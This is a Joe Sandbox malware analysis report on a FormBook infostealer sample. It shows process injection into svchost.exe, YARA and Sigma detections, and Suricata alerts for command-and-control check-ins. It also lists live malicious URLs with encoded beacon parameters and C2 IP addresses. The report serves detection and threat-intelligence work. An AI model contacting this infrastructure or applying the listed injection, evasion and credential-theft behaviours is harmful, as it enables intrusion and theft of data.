Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xBzBOQwywT.exe

Overview

General Information

Sample name:xBzBOQwywT.exe
renamed because original name is a hash value
Original sample name:648cf23613834f4fba89ced0a881139a1883bf00c1c12172fbc7ee53a143e5ef.exe
Analysis ID:1551188
MD5:715ec2a53173921888b38c9731ad9bc9
SHA1:710e6e31cbee07deb127ac9b70a4b1a31cc498f3
SHA256:648cf23613834f4fba89ced0a881139a1883bf00c1c12172fbc7ee53a143e5ef
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xBzBOQwywT.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\xBzBOQwywT.exe" MD5: 715EC2A53173921888B38C9731AD9BC9)
    • svchost.exe (PID: 4360 cmdline: "C:\Users\user\Desktop\xBzBOQwywT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • IpIaYUETnYWFH.exe (PID: 5368 cmdline: "C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RpcPing.exe (PID: 2508 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)
          • IpIaYUETnYWFH.exe (PID: 5284 cmdline: "C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 348 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x3688a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1e919:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1409f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e423:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f223:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\xBzBOQwywT.exe", CommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", ParentImage: C:\Users\user\Desktop\xBzBOQwywT.exe, ParentProcessId: 7092, ParentProcessName: xBzBOQwywT.exe, ProcessCommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", ProcessId: 4360, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\xBzBOQwywT.exe", CommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", ParentImage: C:\Users\user\Desktop\xBzBOQwywT.exe, ParentProcessId: 7092, ParentProcessName: xBzBOQwywT.exe, ProcessCommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", ProcessId: 4360, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-07T15:27:11.595847+010020229301A Network Trojan was detected4.175.87.197443192.168.2.849704TCP
            2024-11-07T15:27:50.811528+010020229301A Network Trojan was detected4.175.87.197443192.168.2.849711TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-07T15:27:37.582756+010020507451Malware Command and Control Activity Detected192.168.2.8497103.33.130.19080TCP
            2024-11-07T15:28:00.989412+010020507451Malware Command and Control Activity Detected192.168.2.84971574.208.236.2580TCP
            2024-11-07T15:28:14.389343+010020507451Malware Command and Control Activity Detected192.168.2.8497753.33.130.19080TCP
            2024-11-07T15:28:27.776036+010020507451Malware Command and Control Activity Detected192.168.2.8498513.33.130.19080TCP
            2024-11-07T15:28:55.479688+010020507451Malware Command and Control Activity Detected192.168.2.8499933.33.130.19080TCP
            2024-11-07T15:29:09.004729+010020507451Malware Command and Control Activity Detected192.168.2.849997199.192.19.1980TCP
            2024-11-07T15:29:23.075547+010020507451Malware Command and Control Activity Detected192.168.2.850001208.91.197.2780TCP
            2024-11-07T15:29:44.886986+010020507451Malware Command and Control Activity Detected192.168.2.850005156.242.132.8280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-07T15:27:37.582756+010028554651A Network Trojan was detected192.168.2.8497103.33.130.19080TCP
            2024-11-07T15:28:00.989412+010028554651A Network Trojan was detected192.168.2.84971574.208.236.2580TCP
            2024-11-07T15:28:14.389343+010028554651A Network Trojan was detected192.168.2.8497753.33.130.19080TCP
            2024-11-07T15:28:27.776036+010028554651A Network Trojan was detected192.168.2.8498513.33.130.19080TCP
            2024-11-07T15:28:55.479688+010028554651A Network Trojan was detected192.168.2.8499933.33.130.19080TCP
            2024-11-07T15:29:09.004729+010028554651A Network Trojan was detected192.168.2.849997199.192.19.1980TCP
            2024-11-07T15:29:23.075547+010028554651A Network Trojan was detected192.168.2.850001208.91.197.2780TCP
            2024-11-07T15:29:44.886986+010028554651A Network Trojan was detected192.168.2.850005156.242.132.8280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-07T15:27:53.493743+010028554641A Network Trojan was detected192.168.2.84971274.208.236.2580TCP
            2024-11-07T15:27:55.903448+010028554641A Network Trojan was detected192.168.2.84971374.208.236.2580TCP
            2024-11-07T15:27:58.408291+010028554641A Network Trojan was detected192.168.2.84971474.208.236.2580TCP
            2024-11-07T15:28:06.681366+010028554641A Network Trojan was detected192.168.2.8497273.33.130.19080TCP
            2024-11-07T15:28:09.292827+010028554641A Network Trojan was detected192.168.2.8497423.33.130.19080TCP
            2024-11-07T15:28:11.773840+010028554641A Network Trojan was detected192.168.2.8497583.33.130.19080TCP
            2024-11-07T15:28:20.067997+010028554641A Network Trojan was detected192.168.2.8498073.33.130.19080TCP
            2024-11-07T15:28:22.624290+010028554641A Network Trojan was detected192.168.2.8498223.33.130.19080TCP
            2024-11-07T15:28:25.156568+010028554641A Network Trojan was detected192.168.2.8498383.33.130.19080TCP
            2024-11-07T15:28:47.802064+010028554641A Network Trojan was detected192.168.2.8499553.33.130.19080TCP
            2024-11-07T15:28:50.411846+010028554641A Network Trojan was detected192.168.2.8499693.33.130.19080TCP
            2024-11-07T15:28:52.899048+010028554641A Network Trojan was detected192.168.2.8499813.33.130.19080TCP
            2024-11-07T15:29:01.378338+010028554641A Network Trojan was detected192.168.2.849994199.192.19.1980TCP
            2024-11-07T15:29:03.932155+010028554641A Network Trojan was detected192.168.2.849995199.192.19.1980TCP
            2024-11-07T15:29:06.449463+010028554641A Network Trojan was detected192.168.2.849996199.192.19.1980TCP
            2024-11-07T15:29:14.989019+010028554641A Network Trojan was detected192.168.2.849998208.91.197.2780TCP
            2024-11-07T15:29:17.523090+010028554641A Network Trojan was detected192.168.2.849999208.91.197.2780TCP
            2024-11-07T15:29:20.065290+010028554641A Network Trojan was detected192.168.2.850000208.91.197.2780TCP
            2024-11-07T15:29:29.814343+010028554641A Network Trojan was detected192.168.2.850002156.242.132.8280TCP
            2024-11-07T15:29:32.709103+010028554641A Network Trojan was detected192.168.2.850003156.242.132.8280TCP
            2024-11-07T15:29:35.365443+010028554641A Network Trojan was detected192.168.2.850004156.242.132.8280TCP
            2024-11-07T15:29:58.903671+010028554641A Network Trojan was detected192.168.2.85000684.32.84.3280TCP
            2024-11-07T15:30:02.614463+010028554641A Network Trojan was detected192.168.2.85000784.32.84.3280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: xBzBOQwywT.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.promasterev.shop/abrg/Avira URL Cloud: Label: malware
            Source: http://www.falconclub.online/sld7/Avira URL Cloud: Label: malware
            Source: http://www.promasterev.shop/abrg/?F2=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CXoS/lp19JNeFf5Feq2s9J88WlfAexgO/UytfAJO4SOXJGQ==&sHS=543hApwHDAvira URL Cloud: Label: malware
            Source: http://www.falconclub.online/sld7/?F2=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlzyIrvo6u+6+g1Ilwo5dhHoQBd/NfHtrD7TOfEhTSvK6UN8A==&sHS=543hApwHDAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: xBzBOQwywT.exeReversingLabs: Detection: 71%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: xBzBOQwywT.exeJoe Sandbox ML: detected
            Source: xBzBOQwywT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IpIaYUETnYWFH.exe, 00000004.00000000.1729593052.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364160593.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: xBzBOQwywT.exe, 00000000.00000003.1592526943.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, xBzBOQwywT.exe, 00000000.00000003.1591484081.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715532753.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1713483766.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1810471522.0000000000B94000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.00000000030EE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1804899051.00000000009E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.1772438382.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1772421164.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000003.2058526696.0000000000C5B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: xBzBOQwywT.exe, 00000000.00000003.1592526943.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, xBzBOQwywT.exe, 00000000.00000003.1591484081.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1806399364.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715532753.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1713483766.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000005.00000002.3365897202.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1810471522.0000000000B94000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.00000000030EE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1804899051.00000000009E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.1772438382.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1772421164.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000003.2058526696.0000000000C5B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000005.00000002.3367266886.000000000357C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000000.1874660765.00000000028AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2101667197.000000002D4CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000005.00000002.3367266886.000000000357C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000000.1874660765.00000000028AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2101667197.000000002D4CC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004EC4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_004EC4E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 4x nop then xor eax, eax5_2_004D9B20
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 4x nop then mov ebx, 00000004h5_2_00AE04E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49710 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49742 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49710 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49712 -> 74.208.236.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 74.208.236.25:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49715 -> 74.208.236.25:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49715 -> 74.208.236.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 74.208.236.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49807 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49822 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49838 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49851 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49851 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49758 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49775 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49775 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49955 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49981 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49993 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49993 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50000 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49998 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49995 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49994 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49999 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:50001 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50001 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49969 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49997 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49997 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49996 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50003 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50002 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50004 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:50005 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50005 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50006 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50007 -> 84.32.84.32:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.demovix.xyz
            Source: Joe Sandbox ViewIP Address: 156.242.132.82 156.242.132.82
            Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
            Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49704
